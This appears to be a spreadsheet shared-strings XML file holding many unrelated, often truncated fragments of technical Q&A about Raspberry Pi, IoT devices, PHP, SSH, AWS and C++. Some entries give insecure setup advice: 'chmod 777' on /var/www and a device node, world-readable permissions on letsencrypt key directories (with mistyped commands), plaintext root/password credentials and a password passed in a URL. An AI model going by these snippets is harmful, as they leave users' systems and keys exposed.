  <si>
    <t>I have two variables:
dataRx (SLAVE::1234)
globalAuthcode (1234)
and I comparing
I can't find function like SUBSTR from PHP :) I want leve only 1234 from dataRx variable.</t>
  </si>
  <si>
    <t>NodeMCU does not utilize PKCS padding but node's crypto module does use/expect it by default, so you need to disable it before calling .update() when decrypting by  decipher.setAutoPadding(false); calling</t>
  </si>
  <si>
    <t>How can I make my python script listen on the commands sent through SSH ?</t>
  </si>
  <si>
    <t>If you are able to get data logged by executing the command mentioned in target device itself then try the solution below.</t>
  </si>
  <si>
    <t>For some reason it rejects logins to send mail even if they are a valid user on the system.</t>
  </si>
  <si>
    <t>I have compared the certificate created when adding as a trigger in Lambda to my certificate created from CSR.</t>
  </si>
  <si>
    <t>I added the following to the createOptions in the deployments.template.json:
This results in a RUNTIME RESPONSE: 400 - The deployment configuration is malformed or invalid.</t>
  </si>
  <si>
    <t>ATDT*99#
NO CARRIER
My wvdialconf file is this:
Init1 = ATZ
Init2 = ATQ0 V1 E1 S0=0 &amp;C1 &amp;D2 +FCLASS=0
Init3 = AT+CGDCONT=1,"IP","internet.etisalat"
Phone = *99#
ISDN = 0
Username = { }
Password = { }
Modem = /dev/ttyUSB1
#Modem = /dev/gsmmodem
Baud = 460800
Stupid Mode = 1
Modem Type = Analog Modem
and my usbmodemswitch config fil looks like this:
Init1 = ATZ
Init2 = ATQ0 V1 E1 S0=0 &amp;C1 &amp;D2 +FCLASS=0
Init3 = AT+CGDCONT=1,"IP","internet.etisalat"
Phone = *99#
ISDN = 0
Username = { }
Password = { }
Modem = /dev/ttyUSB1
#Modem = /dev/gsmmodem
Baud = 460800
Stupid Mode = 1
Modem Type = Analog Modem
I also tried sakis3g and that fails as well.</t>
  </si>
  <si>
    <t>We solved the authentification problem with running the following code:
this is because Mono (by default) doesn't allow outside connections, so you have add it to the certificate list.</t>
  </si>
  <si>
    <t>Edit
Your header file shows the problem now after your edit:
#ifndef AT24C256
#define AT24C256
namespace AT24C256 {
Your are using an anonymous namespace.</t>
  </si>
  <si>
    <t>In the meanwhile i forgot to note its URL so here the answer : 
We have to add manually the provider description into app.config : 
The version and PuclicKeyToken MUST match with npgsql.dll.</t>
  </si>
  <si>
    <t>I prefer to add the user to dialog group because it will persist on reboot:
Note: Please take in account that you need to logout and login again to the group reflect the new user.</t>
  </si>
  <si>
    <t>or
&lt;?php echo exec("python x.py");?&gt;
See this and this
Also make sure and verify that your php engine has enough permissions to run shell commands.</t>
  </si>
  <si>
    <t>According to the official documentation regarding Firestore offline persistence:
For the web, offline persistence is disabled by default.</t>
  </si>
  <si>
    <t>Inside the function add
There is no way to add and configure dirty checking in riot js, as of version 2.2.2-beta.</t>
  </si>
  <si>
    <t>NodeMCU does not utilize PKCS padding but node's  module does use/expect it by default, so you need to disable it before calling .update() when decrypting:
After that change, you will be able to decrypt the commented hex and base64 values in your NodeMCU code.</t>
  </si>
  <si>
    <t>Add property "Privileged" : true into file deployment.template.json
Comment out moduleuser creation in file Dockerfile.arm32v7.</t>
  </si>
  <si>
    <t>Specifying the master key on the command line will leave traces in your shells history and in the process list.</t>
  </si>
  <si>
    <t>[...]
Custom data attributes are intended to store custom data private to
  the page or application, for which there are no more appropriate
  attributes or elements.</t>
  </si>
  <si>
    <t>The Network Access API is constructed around one  object, which holds the common configuration and settings for the requests it sends.</t>
  </si>
  <si>
    <t>My code right now is like this
actual function names for the commented parts are
functions from
    WiFiClientSecure.h
is there any way to use callback methods to fix this issue?</t>
  </si>
  <si>
    <t>I have a small HTTP lambda that once triggered by the device, registers a new Thing and makes IoT generate a new certificate.</t>
  </si>
  <si>
    <t>If you're planning to do this, make sure to check for file types, control the string contents of your $_GET, monitor the directories accessed and tighten up every security hole.</t>
  </si>
  <si>
    <t>Sounds like it is an China Arduino clone with a CH340/1 USB serial chipset; the drivers were not signed previously and new MacOS versions do not allow unsigned kernel drivers (ktext).</t>
  </si>
  <si>
    <t>Anonymous namespaces restrict an identifier to a single file, while global variables allow global access through a given identifier.</t>
  </si>
  <si>
    <t>It is strongly recommended that you set these attributes through the provided replacement functions as they perform validity checks.</t>
  </si>
  <si>
    <t>I researched over it.. making Firebase rule public and using using anonymous auth are two things I got.. What can be best way security wise to achieve it.</t>
  </si>
  <si>
    <t>mksh supports either:
$ echo 1: $((010)); set -o posix; echo 2: $((010))
1: 10
2: 8
Command line history
Persistent history is disabled by default, for privacy reasons.</t>
  </si>
  <si>
    <t>The web interface of a router basically has root access and in most cases you can set a bash script to run, surely that's just as insecure as what I'm trying to achieve with the Raspberry Pi.</t>
  </si>
  <si>
    <t>The requirements i need to fullfill:
mq's must be readable from all members of the mqclients group 
Rights must be 0660 on the mq's 
avoid set gid(chmod g+s) on the client 
Keep the possible security impact of chmod g+sas small as possible.</t>
  </si>
  <si>
    <t>Step 3: Change some permissions because the files are not readable by default: 
sudu chmod -r 775 /etc/letsencrypt/live
sudu chmod -r 775 /etc/letsencrypt/archive
Step 4: Enable LETSENCRYPT auto-update:
./letsencrypt-auto renew
sudo crontab -e
0 0 1 * * /home/pi/letsencrypt/letsencrypt-auto renew
That's it!</t>
  </si>
  <si>
    <t>its state shall not be lost if avoidable), this actor should source out any possibly dangerous sub-tasks to children it supervises and handle failures of these children as appropriate.</t>
  </si>
  <si>
    <t>Most problems these days have to do either with double-escaping caused by magic quotes, or with disabling the option on servers/hosts that have this misfeature enabled and do not allow configuration changes.</t>
  </si>
  <si>
    <t>Microsoft .NET languages such as C# and Visual Basic .NET implement type-safe function pointers with delegates.</t>
  </si>
  <si>
    <t>This is what I tried:
Redirect it directly with expression like: "sudo node node_modules/sensortag/.. &gt; /media/USBname/Data.txt" (it shows me 'access denied'), but the first part of the expression works fine if executed without the redirection part.</t>
  </si>
  <si>
    <t>Anyway, I uninstalled every bluetooth related package I had installed and reinstall them using the raspbian repository and now the Illegal instruction is gone and the script executes correctly.</t>
  </si>
  <si>
    <t>It can perform various tasks such as creating, modifying or deleting databases, tables, fields or rows; executing SQL statements; or managing users and permissions.</t>
  </si>
  <si>
    <t>Moreover, if an identifier declared with internal
  linkage is used in an expression (other than as a part of the operand of a  or
  _Alignof operator whose result is an integer constant), there shall be exactly one
  external definition for the identifier in the translation unit.</t>
  </si>
  <si>
    <t>Although some educated guesswork is involved in finding paths to restricted files on a Web server, a skilled hacker can easily carry out this type of attack on an inadequately protected server by searching through the directory tree.</t>
  </si>
  <si>
    <t>The following description is taken from the FakeItEasy homepage:
A .Net dynamic fake framework for creating all types of fake objects,
  mocks, stubs etc.</t>
  </si>
  <si>
    <t>It makes a few assumptions:
1) Your account has its own ssh key in the  file, so that "ssh localhost" essentially just gives you another shell, without prompting for a password
2) If the ssh command does not complete in three seconds, it would be safe to assume that the ssh daemon is up, but stuck for some reason:
A bit crude, but should be effective.</t>
  </si>
  <si>
    <t>You can add logging to the server callback if you wish to see the registration happening, and the server will also log a message every time an update event is received that triggers a notification to subscribers.</t>
  </si>
  <si>
    <t>However, mime4j does include facilities to decode bodies and fields and the Message class described below handles decoding of fields and bodies transparently.</t>
  </si>
  <si>
    <t>Caused by: java.sql.SQLException: Access denied for user 'root'@'localhost' (using password: YES)
The application.properties file looks like - the connection with database with dynamic IP:
# REMOTE DATABASE
spring.datasource.url = jdbc:mysql://modraszka.sth.sth:3336/test3?autoReconnect=true&amp;useSSL=false
spring.datasource.username = root
spring.datasource.password = password
I must add that when the appication has been deployed at server, at the same server is located database - this one which has dynamic server - modraszka.sth.sth.</t>
  </si>
  <si>
    <t>You could force one solution but that can add a lot of hacked up band-aids simply adding risk to the project, possibly lead to failure and or recalls or field upgrades that were unecessary that make the product and the company look bad.</t>
  </si>
  <si>
    <t>There's an answer, or at least part of the answer of "you can't", which hasn't been covered in the other warnings on reverse engineering:
Strictly speaking: (and I say this as someone who has worked in the field for a couple of decades) You should not be putting any "Internet of Things" type device in a publicly accessible place which is not connecting to its own "IoT" access point really.</t>
  </si>
  <si>
    <t>It occurred as i tried to run the "password_hash" function and wonderd why it didn't work.</t>
  </si>
  <si>
    <t>Should I perhaps use an anonymous function or something?</t>
  </si>
  <si>
    <t>Make sure you file has execute permissions.</t>
  </si>
  <si>
    <t>is used and I don't see anywhere in the provided code it is assigned a valid, dereferencable pointer.</t>
  </si>
  <si>
    <t>PHP function to execute a command on a remote server using ssh protocol.</t>
  </si>
  <si>
    <t>I have changed passwords in the
  Property name="ConnectionPassword"&gt; entry in user-mgt.xml file.</t>
  </si>
  <si>
    <t>However, when I look at my variables, have_ssl stays DISABLED.</t>
  </si>
  <si>
    <t>There is a function signature in an h file, and the definition in the C file.</t>
  </si>
  <si>
    <t>To do that, you can use the os.system() function and connect to the network by execute this bash command:
$ iwconfig wlan0 essid name key password
Replace wlan0 n'y tour network interface, name by the networks name and password by the actual password
So the python code is:</t>
  </si>
  <si>
    <t>A lambda expression represent an anonymous function.</t>
  </si>
  <si>
    <t>kbhit is a C/C++ function used to determine if a key has been pressed or not</t>
  </si>
  <si>
    <t>The system independently derives a bulk encryption key and a MAC key from a common secret.</t>
  </si>
  <si>
    <t>@authenticator
Is a variable that contains data from which to derive an authenticator.</t>
  </si>
  <si>
    <t>The most common types of PKI uses X.509 certificates (and in particular the IETF PKIX profiles).</t>
  </si>
  <si>
    <t>No two unique_ptr instances can manage the same object.</t>
  </si>
  <si>
    <t>For instance, click events are not valid.</t>
  </si>
  <si>
    <t>The targeted environment is running DOS so to my knowledge I need to get the Arduino Leonardo recognized by the BIOS on this machine, which it is not and it does not type the 'A' in DOS.</t>
  </si>
  <si>
    <t>So my qustions are: (QUESTIONSHERE)
1) How can I change the value of colorSource::currentR(/G/B) from within colorGenerator::updateColor(), given that currentR(/G/B) is declared as protected in colorSource and that colorGenerator is directly derived from colorSource?</t>
  </si>
  <si>
    <t>This server shall get the unknown adresses from the dns server of my internet provider by default.</t>
  </si>
  <si>
    <t>That hgrc file AND all the repository directory and subdirectories have to have permissions to allow writing to these directories and folders.</t>
  </si>
  <si>
    <t>I have disabled Driver Signature Verification already.</t>
  </si>
  <si>
    <t>But as soon as I put the code into another class, my xml-data gets corrupted.</t>
  </si>
  <si>
    <t>Currently, I have denied the patron user all sudo permissions and locked down their access to their own file directories (execute only) and those of other users (no access).</t>
  </si>
  <si>
    <t>How to restore the default chown permissions on a default directory after installation of LAMP web server on my Raspberry pi?</t>
  </si>
  <si>
    <t>When the above script is executed ./makeFifo.sh the pipe fifo264 is created in the working directory and it inherits the user permissions of the user.</t>
  </si>
  <si>
    <t>Note, while the
  QString class is reentrant, it is not thread-safe.</t>
  </si>
  <si>
    <t>Q2) What traces can I enabled to understand why the server is rejecting the certificate.</t>
  </si>
  <si>
    <t>Jan 15 12:14:28 raspberrypi systemd[1]: Reached target Encrypted Volumes.</t>
  </si>
  <si>
    <t>Installing and enabling the watchdog service.</t>
  </si>
  <si>
    <t>You can do it in your bash script like this:
Full script example:
#!/bin/bash -u
[[ "$(id -u)" = "0" &amp;&amp; -n "${SUDO_USER:-}" ]] &amp;&amp; exec sudo -u "$SUDO_USER" "$0" "$@"
id -u
This script will print your user id, regardless of whether it's run with sudo.</t>
  </si>
  <si>
    <t>Class BasicAuthenticator
This class checks against self.id and self.secretPassword but they are not set.</t>
  </si>
  <si>
    <t>The values you read on this assignment will be invalid:
This should show a compiler warning, I'm surprised it doesn't.</t>
  </si>
  <si>
    <t>Look into using the function mysqli_real_escape_string() function in order to protect yourself.</t>
  </si>
  <si>
    <t>";
?&gt;
All that said, perhaps it would be best if you adjust permissions for the whole /var/www/ directory like this.</t>
  </si>
  <si>
    <t>the Option 0x01 on TX Request (API frame) doesn't disable the acknowledgment, it does disable the retries (up to 3).</t>
  </si>
  <si>
    <t>You'll probably have to investigate how to disable that communication while youre trying to use your PHP script(s)</t>
  </si>
  <si>
    <t>The user running as php would need permissions set in sudoers.d to execute the commands you need.</t>
  </si>
  <si>
    <t>This is done by typing: 
sudo chmod 777 /var/www
sudo chmod 777 /dev/vchiq
into the Shell command line
maybe you need to get root rights by typing
sudo bash
before.</t>
  </si>
  <si>
    <t>Or change script permissions by following: chmod 755 script.sh.</t>
  </si>
  <si>
    <t>First, you should only run that if the shell is interactive
Second, Xorg intercepts your keyboard codes using Xorg drivers (likely the  driver in this case).</t>
  </si>
  <si>
    <t>If you want to enable
  SSH, all you need to do is to put a file called ssh in the /boot/
  directory.</t>
  </si>
  <si>
    <t>This uniqueness index will reject entries where these two fields are duplicated.</t>
  </si>
  <si>
    <t>Blockchain is not enabled by default, it requires authorization.</t>
  </si>
  <si>
    <t>Returns list of tuples with the information about WiFi access points:
(ssid, bssid, channel, RSSI, authmode, hidden)</t>
  </si>
  <si>
    <t>I have enabled option "Would you like a login shell to be accessible over serial" in .</t>
  </si>
  <si>
    <t>Be sure to grant the proper permissions to execute this task.</t>
  </si>
  <si>
    <t>It seems that Bluetooth is disabled by default on the system image.</t>
  </si>
  <si>
    <t>Now use LowpanIdentity class object for network info provided from getLowpanIdentity() method of LowpanBeaconInfo class.</t>
  </si>
  <si>
    <t>After registering your  on Cumulocity and updating your cumulocity.properties file, you need to enable SPI.</t>
  </si>
  <si>
    <t>Most probably you are executing the code in a different directory where the credentials file is located.</t>
  </si>
  <si>
    <t>If you want to use
then the  Type should be Type:  "RSA PUBLIC KEY",.</t>
  </si>
  <si>
    <t>The warning with the tainted kernel can also be ignored, your driver still should be able to run.</t>
  </si>
  <si>
    <t>What you can additionally do is to put your code in anonymous namespace.</t>
  </si>
  <si>
    <t>`setuid` is a file permission flag under Unix-like systems that will run an executable with the file owner's permissions rather than the invoking user's.</t>
  </si>
  <si>
    <t>Two different elements can be declared with same name unlike their Id which must be defined unique.</t>
  </si>
  <si>
    <t>Authentication is the process of determining whether someone or something is, in fact, who or what it is declared to be.</t>
  </si>
  <si>
    <t>An assertion statement that is verified at the compilation time.</t>
  </si>
  <si>
    <t>It uses Perl-compatible regular expression syntax and can act as a transparent proxy.</t>
  </si>
  <si>
    <t>It is possible to change a links accessKey property in script code.</t>
  </si>
  <si>
    <t>Calling su usually requires typing the target user's password.</t>
  </si>
  <si>
    <t>SecureString object is similar to a  object in that it has a text value.</t>
  </si>
  <si>
    <t>The UPN must be unique among all security principal objects within the directory forest.</t>
  </si>
  <si>
    <t>In almost all instances, the channel has the property that it is reliable; i.e.</t>
  </si>
  <si>
    <t>Each application has access to a private MongoDB database by default.</t>
  </si>
  <si>
    <t>It defines which AWS accounts or groups are granted access and the type of access.</t>
  </si>
  <si>
    <t>Built on top Wildfly / JBoss and implements the OAuth 2.0, Open ID Connect and JSON Web Token (JWT) and SAML 2.0 specifications.</t>
  </si>
  <si>
    <t>Type safe configuration adapter.</t>
  </si>
  <si>
    <t>We all use Version Control Systems for source code, so why not use a specialized framework to provide an audit trail of your Java objects (entities, POJO, data objects)?</t>
  </si>
  <si>
    <t>Essentially, the action maps an identifier to a handler class.</t>
  </si>
  <si>
    <t>In the Directory Server, an SPN is used by Kerberos authentication to associate the IP host service instance to a Directory account object.</t>
  </si>
  <si>
    <t>By default, the plugin will ignore any hidden input elements.</t>
  </si>
  <si>
    <t>However, there are a minority of instances where the warning can be safely ignored.</t>
  </si>
  <si>
    <t>Agreement and integrity are safety properties and build the core of the consensus algorithm.</t>
  </si>
  <si>
    <t>There was some uncertainty over the intellectual property rights to the SSL name so the IETF chose the name Transport Layer Security (TLS).</t>
  </si>
  <si>
    <t>Ethernet adapter with DHCP and SSH server ready on default port (22)
Wireless adapter with DHCP ready if present but disabled.</t>
  </si>
  <si>
    <t>If the userscript is meant to be cross-browser compatible (not always worth the trouble), use both userscripts and tampermonkey.</t>
  </si>
  <si>
    <t>However,
  many network and security features are enabled by knowing the current
  device being used by a subscriber.</t>
  </si>
  <si>
    <t>The child does not inherit any file locks held by the parent.</t>
  </si>
  <si>
    <t>Literally all I need to do now is go to: ip/cgi-bin/power.py?device=0&amp;power=on&amp;time=10&amp;pass=password
That would load a Python script, and turn device 0 on for 10 seconds.</t>
  </si>
  <si>
    <t>After running:
Anyone with a domain account is able to log in regardless of if they are members of the group.</t>
  </si>
  <si>
    <t>The strange thing is I've given permissions for IoT, Kinesis and SNS already to this lambda function but nothing is working.</t>
  </si>
  <si>
    <t>So the error message tells you, that running the assembler fails, because the assembler executable contains an illegal instruction.</t>
  </si>
  <si>
    <t>The dynamic callback tells you when the new driver has been successfully registered with the framework.</t>
  </si>
  <si>
    <t>This meant that when we SSH'd into the Pi, we would login and trigger the right permissions for this user allowing nmcli to function (even though the program runs on startup logged in as the same user we use during ssh).</t>
  </si>
  <si>
    <t>Built on top of JBoss / Wildfly and complies with OAuth 2.0, Open ID Connect, JSON Web Token (JWT) and SAML 2.0 specifications.</t>
  </si>
  <si>
    <t>Keys have to be unique and can be any object as long as they adopt the NSCopying protocol  they are usually an instance of NSString (nsstring).</t>
  </si>
  <si>
    <t>Every time I've tried uninstalling driver and reconnecting, it keeps giving me a driver installation failed error.</t>
  </si>
  <si>
    <t>Is there a way we can add restrictions to the EventHub to receive only valid JSON payloads and reject the invalid ones?</t>
  </si>
  <si>
    <t>If the security group is not the problem, double check that you don't have IPTables running on your EC2 instance</t>
  </si>
  <si>
    <t>For this you will need some kind of access control, this could be implemented with a Lock Object or Event Object.</t>
  </si>
  <si>
    <t>The Nordic SDK has HID examples, but you will have to do some work to implement your own HID report/descriptors stuff.</t>
  </si>
  <si>
    <t>The keychain file(s) stores a variety of data fields including a title, URL, notes and password.</t>
  </si>
  <si>
    <t>Call choosePrivateKeyAlias to allow the user to select from a list of currently available private keys and corresponding certificate chains.</t>
  </si>
  <si>
    <t>Links:
Registering a User Defined Function with Excel
SQL Server User-defined Functions</t>
  </si>
  <si>
    <t>I tried to get around this by adding a file, keyboard.sh which I have given permissions to (chmod u+rwx keyboard.sh) to my desktop which has the lines:
The file is there, and when clicked asks me to either execute, or execute in terminal, both of which do not work.</t>
  </si>
  <si>
    <t>To make this work, you cannot use dynamic addresses because what you type into the table one day would be invalid another.</t>
  </si>
  <si>
    <t>Also, if you are dealing with the GPIO pins, make sure you are running your script with the proper permissions.</t>
  </si>
  <si>
    <t>Add the Pi to WinRemoting's list of TrustedHosts: Set-Item WSMan:\localhost\Client\TrustedHosts -Value &lt;Pi's machine-name or IP Address&gt;.</t>
  </si>
  <si>
    <t>I solved it by adding a virtual method that is overridden in every class that needs the Type-identification.</t>
  </si>
  <si>
    <t>MFRC522 Software Version: 0x0 (unknown) WARNING: Communication
  failure, is the MFRC522 properly connected?</t>
  </si>
  <si>
    <t>OWASP provide a long list of cheat sheets to help address security issues with common application design.</t>
  </si>
  <si>
    <t>I know for a fact that the app is readable if I don't add the AES encryption, and can verify the contents using a Python script.</t>
  </si>
  <si>
    <t>I'm a bit confused because there is no more explaination that Illegal instruction
I checked the version of imutils that is the same on my computer that on the Raspberry (0.4.6)</t>
  </si>
  <si>
    <t>I am trying to make the keyMap strictly out of hex integers so I can output them for my bluetooth rn42 module, however the built-in .getKey() and .getKeys() functions only take and return characters.</t>
  </si>
  <si>
    <t>A login Python script resolved this issue, selenium-IDE was able to record actions and make it a script.</t>
  </si>
  <si>
    <t>HTML 5 custom data attributes are intended to store custom data private to the page or application, for which there are no more appropriate attributes or elements.</t>
  </si>
  <si>
    <t>Sender ID is an obsolete protocol derived from SPF developed by Microsoft, which validates one of the message's address header fields defined by RFC 2822.</t>
  </si>
  <si>
    <t>All connection requests using EC2 Instance Connect are logged to AWS CloudTrail to enable auditing of connection requests.</t>
  </si>
  <si>
    <t>Custom data attributes are intended to store custom data private to the page or application, for which there are no more appropriate attributes or elements.</t>
  </si>
  <si>
    <t>Here is a list of key functions provided by Visual SourceSafe 2005:
Helps protect developers team from accidental file loss.</t>
  </si>
  <si>
    <t>At any time, the hidden information beyond the current level of detail can be unhidden and made visible.</t>
  </si>
  <si>
    <t>*** Just a note, edited my code to incorporate the debounce time in your original ISR to ensure that the interrupt is valid.</t>
  </si>
  <si>
    <t>A new  field on the User object makes it easier to identify the same person across multiple apps owned by the same business.</t>
  </si>
  <si>
    <t>To prevent local storage of malicious code, the API prohibits storage of executable files (such as .exe files) in the virtualized file system.</t>
  </si>
  <si>
    <t>Likely the call will be invalid because the  pointer will be garbage(may compile fine but will throw strange errors at runtime).</t>
  </si>
  <si>
    <t>Workflow:
1) SSH into Pi via terminal
2) Once logged in, the Pi executes a command to display the current temperature (I already know of this command)
The pi already outputs
I could be misunderstanding this all together, perhaps even have the command executed and shown in the dialog above.</t>
  </si>
  <si>
    <t>According Microsoft: "Note, ProcessLauncher API launches executables under the current user credentials, or DefautlAccount, so apps requiring admin priviliges will fail to run properly."</t>
  </si>
  <si>
    <t>There are several tutorials on Cygwin with private key authentication, like this one: https://dbaportal.eu/2015/03/06/setup-openssh-cygwin-for-public-key-authentication/
Note that you will probably have to set up proper access rights for .ssh directory in Windows.</t>
  </si>
  <si>
    <t>Newer versions of Windows (Vista+) will refuse to execute programs stored as alternate streams (a security measure against running invisible EXE's)</t>
  </si>
  <si>
    <t>The algorithms implemented by class Random use a protected utility method that on each invocation can supply up to 32 pseudorandomly generated bits.</t>
  </si>
  <si>
    <t>It is not possible to modify and generate valid XML from a TBXML object and no validation is performed whatsoever whilst importing and parsing an XML document.</t>
  </si>
  <si>
    <t>The Csrf Middleware for Django modifies outgoing requests that are associated with a session by adding a hidden form field to all 'POST' forms, with name 'csrfmiddlewaretoken' and a value which is a hash of the session ID plus a secret.</t>
  </si>
  <si>
    <t>The code could then look like this, assuming that /home/pi/raspberry-remote/send is executable:
Note that some restrictions may apply to these functions, if PHP runs in safe mode.</t>
  </si>
  <si>
    <t>EDIT: The following did not work after all:
The problem was resolved by granting sudo privileges to the user that
  the program runs on, and we're now looking into other options
  regarding the permissions (as sudo is a bit overzealous).</t>
  </si>
  <si>
    <t>This is the error I get when executing a PDO connection to mysql dbms: 
Fatal error: Class '' not found in /var/www/labCrawl/Data.php on line 7
php code that throws error: 
Also, my code is working fine on my osx machine, but when I put it on my pi, pdo fails to be recognized.</t>
  </si>
  <si>
    <t>C programming language: key_t ftok(const char *pathname, int proj_id); The ftok()  function  uses the identity of the file named by the given pathname (which must refer to an existing, accessible file) and the least significant 8 bits of proj_id (which must be nonzero) to generate a key_t type System V IPC key, suitable for use with msgget(2), semget(2), or shmget(2).</t>
  </si>
  <si>
    <t>For instance creating a text box is as easy as:
which in turn when compiled becomes:
&lt;label&gt;Name&lt;/label&gt;
&lt;?php echo Phalcon\Tag::textField(array('mytext', 'size' =&gt; 32)); ?&gt;
A core design feature in Volt is security, so it offers a limited set of functions that can be used in the templates, while aiding in escaping potentially malicious input by the users.</t>
  </si>
  <si>
    <t>NSUnknownKeyException is a common error when using "Key-Value Coding" to access a key that the object doesn't have.</t>
  </si>
  <si>
    <t>Do you want to enable secure function?</t>
  </si>
  <si>
    <t>Note: Currently, you must trigger the reboot on the device.</t>
  </si>
  <si>
    <t>Since the file is a valid executable, the error message should vanish.</t>
  </si>
  <si>
    <t>It seems that you can not protect the data volume(U:) via command .</t>
  </si>
  <si>
    <t>An Oracle statement to execute a dynamic query or anonymous PL/SQL block.</t>
  </si>
  <si>
    <t>Note that most scripts written for Firefox Greasemonkey will also work with Tampermonkey.</t>
  </si>
  <si>
    <t>This function is to register a function with the Standard PHP Library (SPL) provided  stack.</t>
  </si>
  <si>
    <t>It mocks the public/protected interfaces of Python objects.</t>
  </si>
  <si>
    <t>The MBeanServer provides the invocation interface for accessing registered MBeans.</t>
  </si>
  <si>
    <t>The python script would need 'sudo' authorization... so if I wanted to run in terminal:
Thanks!</t>
  </si>
  <si>
    <t>Are there any particular critical sections for which I should disable interrupts?</t>
  </si>
  <si>
    <t>After execution, I should get the data in the variable password, which are in the variable tempStr ie.</t>
  </si>
  <si>
    <t>But when I run a script that calls them, I get a permission denied even though I am in the gpio group.</t>
  </si>
  <si>
    <t>I have an AWS IoT implementation which will do Just In Time Registration (JITR) such as activating the device certificate using Lambda function.</t>
  </si>
  <si>
    <t>I think you need to login to target server using SSH and then execute your File write command.</t>
  </si>
  <si>
    <t>So if somebody access to user that can execute script, he can read password.</t>
  </si>
  <si>
    <t>You can run your compiled code like so:
By default, this creates a lockfile in /tmp.</t>
  </si>
  <si>
    <t>Note that sshpass is no longer needed and pi is easier to type than pi@192.168.0.101.</t>
  </si>
  <si>
    <t>PHP function to register a function with the Standard PHP Library (SPL) provided `__autoload` stack.</t>
  </si>
  <si>
    <t>An access control list (ACL), with respect to a computer file system, is a list of permissions attached to an object.</t>
  </si>
  <si>
    <t>unique_ptr is not copyable or copy-assignable, two instances of unique_ptr cannot manage the same object.</t>
  </si>
  <si>
    <t>Each object in the hierarchy serves as a namespace into which other objects are encoded.</t>
  </si>
  <si>
    <t>Some people use the PSL to determine what is a valid domain name and what isn't.</t>
  </si>
  <si>
    <t>This will ensure the profile script is not executed.</t>
  </si>
  <si>
    <t>Prepared statements will also better protect you against SQL injection attacks.</t>
  </si>
  <si>
    <t>Convert any AHK script into an executable file that can be run on
computers where AutoHotkey is not installed.</t>
  </si>
  <si>
    <t>The platform is protected by a built-in proxy and anonymizer.</t>
  </si>
  <si>
    <t>Update
I forgot to wrote, all required users have permissions to execute files in my (...)/ssh directory</t>
  </si>
  <si>
    <t>Now I can execute commands with the root's privileges using sudo.</t>
  </si>
  <si>
    <t>So, the detection of default keypoints (simple black circles) appears to be working just fine.</t>
  </si>
  <si>
    <t>The client name I'm using is 
Where orgid is my orgID from Bluemix and the Device type and id are from the device I created and registered in the IoTF.</t>
  </si>
  <si>
    <t>Here's a dumbed down version of what I did:
Here's the version of loop that's fine:
Notice the "atomic access guards", ie: disabling interrupts before decrementing, then re-enabling them after.</t>
  </si>
  <si>
    <t>In my router giving it a default address is disabled.</t>
  </si>
  <si>
    <t>We created a Lambda Function on the server side to generate certificates for our users.</t>
  </si>
  <si>
    <t>Within Azure I have enabled authentication and set the options to Active Directory as seen below.</t>
  </si>
  <si>
    <t>Note: This function support RealCOM with secure mode only.</t>
  </si>
  <si>
    <t>I've used the WebView class method .Navigate() for non-protected pages and It works really neat.</t>
  </si>
  <si>
    <t>In some testing I've done so far, I've found that it is possible to use  on one's own user directory, even without sudo privileges.</t>
  </si>
  <si>
    <t>This is done by service script either with password or with key authentication which both require password/passphrase to be present in a script or in a file.</t>
  </si>
  <si>
    <t>I don't want to leave my data public, so is there a way to authenticate to a Firebase Database using something like an API key?</t>
  </si>
  <si>
    <t>To illustrate:
(safety checks omitted, serial code omitted).</t>
  </si>
  <si>
    <t>This cause deletion of the session keys that are generated during OTAA and cleanup of the devEUI
LoRa device keep sending the data, and it is rejected on the server.</t>
  </si>
  <si>
    <t>to register device 
Please help with any ideas or pointers that help understand resolve it.</t>
  </si>
  <si>
    <t>I launched an EC2 instance in my VPC's private network and try to access internet from it, this work and I can see trafic going throung my nat instance.</t>
  </si>
  <si>
    <t>Firewall is disabled as default on Raspberry Pi, so it should not be an issue.</t>
  </si>
  <si>
    <t>N: Updating from such a repository can't be done securely, and is therefore disabled by default.</t>
  </si>
  <si>
    <t>Your kernel should already have low-level drivers hooked in to provide access through sysfs.</t>
  </si>
  <si>
    <t>Try chomping it off:
To verify the class of , insert p doorstate.class at line 2.</t>
  </si>
  <si>
    <t>Even so, I believe that it is possible to access the on-chip debug from the target itself see ARM's documentation for details.</t>
  </si>
  <si>
    <t>Of course you can build some trickeries based on Device Informations (fsys and udev) and crypt your disk.</t>
  </si>
  <si>
    <t>Sudo is a temporary root permission for the line of command to be typed out after sudo.</t>
  </si>
  <si>
    <t>while enabled, some process on the raspi will need to inform the watchdog that everything is still ok.</t>
  </si>
  <si>
    <t>I'll be using your XBee radio module which is already a member of the network, and possibly trusted due to its MAC address.</t>
  </si>
  <si>
    <t>VLAN tagging occurs at the Ethernet header level, not the IP header.</t>
  </si>
  <si>
    <t xml:space="preserve">
warning: GMP or MPIR library not found; Not building Crypto.PublicKey._fastmath.</t>
  </si>
  <si>
    <t>For instance usually a security endstop falls in the first group, since as soon as you hit it you need to stop the actuator.</t>
  </si>
  <si>
    <t>C++ does not make any promises about the value of an uninitialized variable, and even reading it can cause anything to happen.</t>
  </si>
  <si>
    <t>This assuming that www-data user have correct permissions on your file systems to execute the python scripts.</t>
  </si>
  <si>
    <t>Tips :: if you are using AWS instance then use public IP address of your instance.</t>
  </si>
  <si>
    <t>The console application retrieves the blob name using:
The FileNotification object also has a DeviceId property that gives you the device id you need.</t>
  </si>
  <si>
    <t>If you have the scripts stored on the rpi you could run them over the SSH using commands like: 
personally I use JuiceSSH for connecting to raspberry pi from my cellphone.</t>
  </si>
  <si>
    <t>wolfSSL has static key cipher suites disabled by default for security.</t>
  </si>
  <si>
    <t>If one microcontroller uses a different endianness than the other, or if one C compiler uses different struct padding rules than the other, then the deserialized data could be corrupted.</t>
  </si>
  <si>
    <t>As your device now identifies itself as an HID device, the system no longer creates a corresponding tty file.</t>
  </si>
  <si>
    <t>Solved for me updating the driver (Use the one below):
Mac OS X 10.9 and above
This driver is signed by Apple
https://www.ftdichip.com/Drivers/VCP.htm</t>
  </si>
  <si>
    <t>You don't need to specify the enrollment type (individual/group) when registering the device.</t>
  </si>
  <si>
    <t>You could also try to disable safe-mode but it is deprecated and not recommended by any means.</t>
  </si>
  <si>
    <t>Some also says that It is caused by the anti-malware software and recommend to disable it while running the program.</t>
  </si>
  <si>
    <t>Most of the implemented probe functions even check if the device is plugged in or not.</t>
  </si>
  <si>
    <t>An exception that occurs when trying to access an object for which you don't have the correct security authorization.</t>
  </si>
  <si>
    <t>Most current file systems have methods of administering permissions or access rights to specific users and groups of users.</t>
  </si>
  <si>
    <t>Gem that allows you to encrypt a Chef Data Bag Item using the public keys of a list of chef nodes.</t>
  </si>
  <si>
